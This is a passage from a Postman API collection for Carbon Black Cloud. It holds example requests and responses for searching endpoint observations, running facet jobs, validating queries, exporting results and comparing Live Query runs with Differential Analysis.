\"be6ff259-88e3-6286-789f-74defa192fff\"\n                        ],\n                        \"backend_timestamp\": \"2023-02-08T03:22:21.570Z\",\n                        \"device_external_ip\": \"127.0.0.1\",\n                        \"device_group_id\": 0,\n                        \"device_id\": 17482451,\n                        \"device_installed_by\": \"bit9qa\",\n                        \"device_internal_ip\": \"127.0.0.1\",\n                        \"device_location\": \"ONSITE\",\n                        \"device_name\": \"dev01-39x-1\",\n                        \"device_os\": \"WINDOWS\",\n                        \"device_os_version\": \"Windows 10 x64\",\n                        \"device_policy\": \"lonergan policy\",\n                        \"device_policy_id\": 12345,\n                        \"device_target_priority\": \"MEDIUM\",\n                        \"device_timestamp\": \"2023-02-08T03:20:33.751Z\",\n                        \"document_guid\": \"KBrOYUNlTYe116ADgNvGw\",\n                        \"enriched\": true,\n                        \"enriched_event_type\": \"NETWORK\",\n                        \"event_description\": \"The script...\",\n                        \"event_id\": \"8fbccc2da75f11ed937ae3cb089984c6\",\n                        \"event_network_inbound\": false,\n                        \"event_network_local_ipv4\": \"127.0.0.1\",\n                        \"event_network_location\": \"Santa Clara,CA,United States\",\n                        \"event_network_protocol\": \"TCP\",\n                        \"event_network_remote_ipv4\": \"127.0.0.1\",\n                        \"event_network_remote_port\": 80,\n                        \"event_report_code\": \"SUB_RPT_NONE\",\n                        \"event_threat_score\": [\n                                3\n                        ],\n                        \"event_type\": \"netconn\",\n                        \"ingress_time\": 1675826462036,\n                        \"legacy\": true,\n                        \"netconn_actions\": [\n                                \"ACTION_CONNECTION_ESTABLISHED\"\n                        ],\n                        \"netconn_domain\": \"a1887..dscq..akamai..net\",\n                        \"netconn_inbound\": false,\n                        \"netconn_ipv4\": 388818410,\n                        \"netconn_local_ipv4\": 11111,\n                        \"netconn_local_port\": 11,\n                        \"netconn_location\": \"Santa Clara,CA,United States\",\n                        \"netconn_port\": 80,\n                        \"netconn_protocol\": \"PROTO_TCP\",\n                        \"observation_description\": \"The application firefox.exe invoked \",\n                        \"observation_id\": \"8fbccc2da75f11ed937ae3cb089984c6:be6ff259-88e3-6286-789f-74defa192d2e\",\n                        \"observation_type\": \"CB_ANALYTICS\",\n                        \"org_id\": \"ABCD123456\",\n                        \"parent_effective_reputation\": \"ADAPTIVE_WHITE_LIST\",\n                        \"parent_effective_reputation_source\": \"CLOUD\",\n                        \"parent_guid\": \"TEST-010ac2d3-00001c68-00000000-1d93b6c4d1f20ad\",\n                        \"parent_hash\": [\n                                \"69c8bd1c1dc6103df6bfa9882b5717c0dc4acb8c0c85d8f5c9900db860b6c29b\"\n                        ],\n                        \"parent_name\": \"c:\\\\program files\\\\mozilla firefox\\\\firefox.exe\",\n                        \"parent_pid\": 7272,\n                        \"parent_reputation\": \"NOT_LISTED\",\n                        \"process_cmdline\": [\n                                \"C:\\\\Program Files\\\\Mozilla \"\n                        ],\n                        \"process_cmdline_length\": [\n                                268\n                        ],\n                        \"process_effective_reputation\": \"NOT_LISTED\",\n                        \"process_effective_reputation_source\": \"AV\",\n                        \"process_guid\": \"ABCD123456-010ac2d3-00001cf8-00000000-1d93b6c4d2b16a4\",\n                        \"process_hash\": [\n                                \"9df1ec5e25919660a1b0b85d3965d55797b9aac81e028008428106c4dc\"\n                        ],\n                        \"process_name\": \"c:\\\\programdata\\\\mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\\\updates\\\\308046b0af4a39cb\\\\backgroundupdate.moz_log\",\n                        \"process_pid\": [\n                                7416\n                        ],\n                        \"process_reputation\": \"NOT_LISTED\",\n                        \"process_sha256\": \"9df1ec5e25919660a1b0b85d3965d55797b9aac81e028008428106c4dc\",\n                        \"process_start_time\": \"2023-02-08T03:20:32.131Z\",\n                        \"process_username\": [\n                                \"DEV01-39X-1\\\\bit9qa\"\n                        ],\n                        \"ttp\": [\n                                \"INTERNATIONAL_SITE\",\n                                \"ACTIVE_CLIENT\",\n                                \"NETWORK_ACCESS\",\n                                \"UNKNOWN_APP\"\n                        ]\n                }\n        ]\n}"}],"_postman_id":"a9ec7020-ea4a-4b0a-ba0b-6610c8149b09"}],"id":"002a04a9-968c-4b44-981a-f27b4718df21","description":"<p>Use the Observations Details search to get additional fields. Whether a field is returned on the main search, or only on the Details search is available on the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields/\">Search Fields documentation</a>.</p>\n","_postman_id":"002a04a9-968c-4b44-981a-f27b4718df21","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Observation Facet Job","item":[{"name":"Start Facet Job","id":"39c1dbf5-5875-4b27-b4c1-4a9541b8def7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device_name\": [\n            \"Win7x64\"\n        ]\n    },\n    \"query\": \"process_name:svchost.exe\",\n    \"ranges\": [\n        {\n            \"bucket_size\": \"+12HOUR\",\n            \"end\": \"2020-08-05T08:01:32.077Z\",\n            \"field\": \"device_timestamp\",\n            \"start\": \"2020-08-04T08:01:32.077Z\"\n        }\n    ],\n    \"terms\": {\n        \"fields\": [\n            \"process_username\"\n        ],\n        \"rows\": 100\n    },\n    \"time_range\": {\n        \"end\": \"2020-08-05T08:01:32.077Z\",\n        \"start\": \"2020-08-04T08:01:32.077Z\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/facet_jobs","description":"<p>Creates an observations facet job. The results for the facet job may be requested using the query ID returned. This route will not request processes.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"criteria\": \"\",\n    \"exclusions\": \"\",\n    \"query\": \"\",\n    \"ranges\": [\n        {\n            \"bucket_size\": \"\",\n            \"end\": \"\",\n            \"field\": \"\",\n            \"start\": \"\"\n        }\n    ],\n    \"terms\": {\n        \"fields\": [\n            \"\"\n        ],\n        \"rows\": \"\"\n    },\n    \"time_range\": {\n        \"end\": \"\",\n        \"start\": \"\",\n        \"window\": \"\"\n    }\n}API DocumentationInformation on Fields\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","facet_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"8b03549f-6f29-4614-8302-e31278170e10","name":"Start Facet Job","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device_name\": [\n            \"Win7x64\"\n        ]\n    },\n    \"query\": \"process_name:svchost.exe\",\n    \"ranges\": [\n        {\n            \"bucket_size\": \"+12HOUR\",\n            \"end\": \"2020-08-05T08:01:32.077Z\",\n            \"field\": \"device_timestamp\",\n            \"start\": \"2020-08-04T08:01:32.077Z\"\n        }\n    ],\n    \"terms\": {\n        \"fields\": [\n            \"process_username\"\n        ],\n        \"rows\": 100\n    },\n    \"time_range\": {\n        \"end\": \"2020-08-05T08:01:32.077Z\",\n        \"start\": \"2020-08-04T08:01:32.077Z\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/facet_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 20:47:58 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"617e9309-0e8a-4163-a61f-47311ddc132a\"\n}"}],"_postman_id":"39c1dbf5-5875-4b27-b4c1-4a9541b8def7"},{"name":"Get Facet Results","id":"c036df49-a380-4d6d-83ad-71beac757bdf","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/facet_jobs/{{cb_job_id}}/results?limit=","description":"<p>Retrieves the observations facet results for a given Job ID.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/observations-api/#get-facet-results\">API Documentation</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","facet_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Maximum number of facets per category (i.e Any Process Search Fields listed in terms.fields)</p>\n","type":"text/plain"},"key":"limit","value":""}],"variable":[]}},"response":[{"id":"ae013d15-52a2-497e-86ad-f57cc29fa490","name":"Get Facet Results","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/facet_jobs/{{cb_job_id}}/results?limit","host":["{{cb_url}}"],"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","facet_jobs","{{cb_job_id}}","results"],"query":[{"key":"limit","value":null,"description":"Maximum number of facets per category (i.e Any Process Search Fields listed in terms.fields)"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 20:50:24 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"204"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"ranges\": [\n        {\n            \"start\": \"2020-08-04T08:01:32.077Z\",\n            \"end\": \"2020-08-05T08:01:32.077Z\",\n            \"bucket_size\": \"+1HOUR\",\n            \"field\": \"device_timestamp\",\n            \"values\": [\n                {\n                    \"total\": 456,\n                    \"name\": \"2020-08-04T08:01:32.077Z\"\n                },\n                {\n                    \"total\": 374,\n                    \"name\": \"2020-08-04T20:01:32.077Z\"\n                }\n            ]\n        }\n    ],\n    \"terms\": [\n        {\n            \"values\": [\n                {\n                    \"total\": 414,\n                    \"id\": \"NT AUTHORITY\\\\SYSTEM\",\n                    \"name\": \"NT AUTHORITY\\\\SYSTEM\"\n                },\n                {\n                    \"total\": 323,\n                    \"id\": \"NT AUTHORITY\\\\NETWORK SERVICE\",\n                    \"name\": \"NT AUTHORITY\\\\NETWORK SERVICE\"\n                },\n                {\n                    \"total\": 71,\n                    \"id\": \"NT AUTHORITY\\\\LOCAL SERVICE\",\n                    \"name\": \"NT AUTHORITY\\\\LOCAL SERVICE\"\n                }\n            ],\n            \"field\": \"process_username\"\n        }\n    ],\n    \"num_found\": 808,\n    \"contacted\": 6,\n    \"completed\": 6\n}"}],"_postman_id":"c036df49-a380-4d6d-83ad-71beac757bdf"}],"id":"1d4e9a7e-04b8-4e55-abd0-0f7313338b3b","_postman_id":"1d4e9a7e-04b8-4e55-abd0-0f7313338b3b","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Search Suggestions for Observations","id":"09da6bba-9bca-422d-9885-321593565f60","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_suggestions?suggest.q=device_id&suggest.count=2","description":"<p>Returns suggestions for the observations search based on fields in the organization’s system. Will return field names if the “suggest.q” parameter does not yet contain a colon and will return no suggestion otherwise.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/observations-api/#search-suggestions-for-observationse\">API Documentation</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","search_suggestions"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>The query to generate suggestions for</p>\n","type":"text/plain"},"key":"suggest.q","value":"device_id"},{"description":{"content":"<p>The number of suggestions to return</p>\n","type":"text/plain"},"key":"suggest.count","value":"2"}],"variable":[]}},"response":[{"id":"6503f7d2-fedc-414a-98dd-2fd8d0e44b01","name":"Search Suggestions for Observations","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_suggestions?suggest.q=device_id&suggest.count=2","host":["{{cb_url}}"],"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","search_suggestions"],"query":[{"key":"suggest.q","value":"device_id","description":"The query to generate suggestions for"},{"key":"suggest.count","value":"2","description":"The number of suggestions to return"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 20:23:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"223"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"suggestions\": [\n        {\n            \"term\": \"device_id\",\n            \"weight\": 500,\n            \"required_skus_all\": [],\n            \"required_skus_some\": [\n                \"threathunter\",\n                \"defense\"\n            ]\n        },\n        {\n            \"term\": \"netconn_remote_device_id\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"xdr\"\n            ],\n            \"required_skus_some\": []\n        }\n    ]\n}"}],"_postman_id":"09da6bba-9bca-422d-9885-321593565f60"},{"name":"Validate Observation Search","id":"dfaa90d1-4ca0-4851-ba1c-366452e42123","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_validation?q=*:*&cb.min_backend_timestamp=1641469642000&cb.max_backend_timestamp=1678103242000","description":"<p>Returns the validation status of a given observations query and potentially gives validation on how to fix invalid queries.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/observations-api/#validate-observation-search\">API Documentation</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","search_validation"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>The query to validate</p>\n","type":"text/plain"},"key":"q","value":"*:*"},{"description":{"content":"<p>The start time for the query - unix timestamp in milliseconds</p>\n","type":"text/plain"},"key":"cb.min_backend_timestamp","value":"1641469642000"},{"description":{"content":"<p>The end time for the query - unix timestamp in milliseconds</p>\n","type":"text/plain"},"key":"cb.max_backend_timestamp","value":"1678103242000"}],"variable":[]}},"response":[{"id":"85e2b9e3-7e07-4042-84a9-b455fe5f3282","name":"Validate Observation Search","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_validation?q=*:*&cb.min_backend_timestamp=1641469642000&cb.max_backend_timestamp=1678103242000","host":["{{cb_url}}"],"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","search_validation"],"query":[{"key":"q","value":"*:*","description":"The query to validate"},{"key":"cb.min_backend_timestamp","value":"1641469642000","description":"The start time for the query - unix timestamp in milliseconds"},{"key":"cb.max_backend_timestamp","value":"1678103242000","description":"The end time for the query - unix timestamp in milliseconds"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 20:29:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"41"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"valid\": true,\n    \"value_search_query\": false\n}"}],"_postman_id":"dfaa90d1-4ca0-4851-ba1c-366452e42123"},{"name":"Export Observations Search Results with Jobs Service","id":"0a096f4e-83ad-4672-bb1d-bc221bc8d487","protocolProfileBehavior":{"disableBodyPruning":true,"disabledSystemHeaders":{}},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"OBSERVATIONS\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export","description":"<p>This is a specific example for exporting Observations which uses the generic Jobs Service. The sequence to use the jobs services is</p>\n<ol>\n<li>Start an Export Event Job (this call)</li>\n<li>Check the job has completed with Get Job Progress</li>\n<li>Download the Job Output. The response is a zipped csv file of results.</li>\n</ol>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p>Full documentation is available on the <a href=\"https://developer.carbonblack.com/\">Developer Network</a></p>\n<ul>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a></li>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/observations-api/\">Observations API</a></li>\n</ul>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["jobs","v1","orgs","{{cb_org_key}}","jobs","start","event_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"26d25418-fe2b-46f6-b516-d28cbae67a99","name":"Export Observations Search Results with Jobs Service","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"OBSERVATIONS\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": 5731358,\n    \"type\": \"event_export\",\n    \"job_parameters\": {\n        \"job_parameters\": {\n            \"query\": {\n                \"criteria\": {},\n                \"exclusions\": {},\n                \"query\": \"*:*\",\n                \"time_range\": {\n                    \"start\": \"2023-03-26T02:00:00.000Z\",\n                    \"end\": \"2023-03-29T02:06:20.864Z\"\n                },\n                \"rows\": 10000,\n                \"fields\": [\n                    \"*\"\n                ],\n                \"sort\": [\n                    {\n                        \"field\": \"device_timestamp\",\n                        \"order\": \"DESC\"\n                    }\n                ]\n            }\n        },\n        \"process_guid\": null,\n        \"api_resource\": \"OBSERVATIONS\",\n        \"version\": \"v2\",\n        \"search_id\": null\n    },\n    \"connector_id\": \"12345ABCD\",\n    \"org_key\": \"ABCD1234\",\n    \"status\": \"CREATED\",\n    \"create_time\": \"2023-03-29T03:05:34.335Z\",\n    \"last_update_time\": \"2023-03-29T03:05:34.336Z\"\n}"}],"_postman_id":"0a096f4e-83ad-4672-bb1d-bc221bc8d487"}],"id":"e2fbb868-edcf-4398-b299-db8e84582e36","description":"<p>This API lets you search through all the data that is reported by your organization’s sensors to find one or more specific enriched events that match the consumer’s search criteria. You can:</p>\n<ul>\n<li>See tactics, techniques and procedures (TTPs) and the MITRE CVEs associated with potentially malicious activity</li>\n<li>Get visibility into the cyber kill chain stage at which attacks were stopped</li>\n<li>Identify the family and name of malware observed and stopped on your organization’s endpoints</li>\n</ul>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/observations-api/\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields/\">Information on Fields</a></p>\n","_postman_id":"e2fbb868-edcf-4398-b299-db8e84582e36","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"14d40e8b-d5a4-4aa3-891a-4dfdca780b33","description":"<h2 id=\"introduction\">Introduction</h2>\n<p>We have extended the capabilities of the Devices API by improving the methods of retrieving device information, and adding functionality to perform actions. We have also extended the capabilities of the Alerts API by improving the methods of retrieving alerts, and adding functionality to manage the workflow by updating the alert status.</p>\n<h2 id=\"getting-started\">Getting Started</h2>\n<p>Platform APIs are available to all Carbon Black Cloud customers. These platform level APIs are augmented by product specific APIs. Below is a list of APIs available.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform-apis/\">See Documentation</a></p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"997ffea0-2348-406e-840c-11b5c2589a11"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"333be828-7c2f-482c-b7cd-5f4150ac8da0"}}],"_postman_id":"14d40e8b-d5a4-4aa3-891a-4dfdca780b33","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Audit and Remediation API","item":[{"name":"Differential Analysis API","item":[{"name":"Get Facets From Live Query Results Copy","id":"34fe4135-db0d-4068-a2f5-f166f71bf42d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"count_only\": boolean,\n  \"criteria\": {\n    \"device_id\": [ integer ]\n  },\n  \"newer_run_id\": \"<string>\",\n  \"older_run_id\": \"<string>\"\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/differential/runs/_search?async&format","description":"<p>Compare two <a href=\"http://developer.carbonblack.com.s3-website-us-east-1.amazonaws.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/\">Live Query</a> result sets asynchronously, and optionally export the response as JSON file. A result set can be two individual Live Query runs or any two ids from an automatically recurring query.</p>\n<p>RBAC Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/differential-analysis-api/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","differential","runs","_search"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Whether the results of the call should be returned directly (false) or available for asynchronous return (true)</p>\n","type":"text/plain"},"key":"async","value":""},{"description":{"content":"<p>Format of the results, json or csv</p>\n","type":"text/plain"},"key":"format","value":""}],"variable":[]}},"response":[],"_postman_id":"34fe4135-db0d-4068-a2f5-f166f71bf42d"}],"id":"3dc97563-054c-4c55-8309-894e2bddbe22","description":"<h1 id=\"overview\">Overview</h1>\n<p>Audit and Remediation is a real-time query and remediation solution that gives teams faster, easier access to audit and change the system state of endpoints across their organization. It contains three components; <a href=\"http://developer.carbonblack.com.s3-website-us-east-1.amazonaws.com/reference/carbon-black-cloud/platform/latest/live-response-api/\">Live Response</a>, <a href=\"http://developer.carbonblack.com.s3-website-us-east-1.amazonaws.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/\">Live Query</a>, and Differential Analysis. This document describes the Differential Analysis API.</p>\n<p>Differential Analysis provides the ability to compare and understand the changes between two <a href=\"http://developer.carbonblack.com.s3-website-us-east-1.amazonaws.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api\">Live Query</a> runs. The differential is calculated based on point-in-time snapshots. These features answer the question, “What changed on endpoints, and when?”.</p>\n<h2 id=\"key-features\">Key Features</h2>\n<p>* Compare current with previous point-in-time snapshots of endpoints to understand what was changed on them<br />* Export results asynchronously</p>\n<h2 id=\"use-cases\">Use Cases</h2>\n<p>* Monitor files, folders, and registry keys with a low change probability<br />* Monitor for changes or modifications to the configuration of endpoints<br />* Monitor for unexpected installations and changes to existing browser extensions<br />* Monitor for changes in security settings such as drive encryption, password standards, service stoppages, RDP events and more</p>\n<h2 id=\"rate-limits\">Rate Limits</h2>\n<p>These rate limits apply on a per-org basis.</p>\n<p>* 350 requests / 5 mins for Sync API<br />* 100 requests / 5 mins for Async API</p>\n<p>More information is available on the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/differential-analysis-api/\">Developer Network Differential Query API 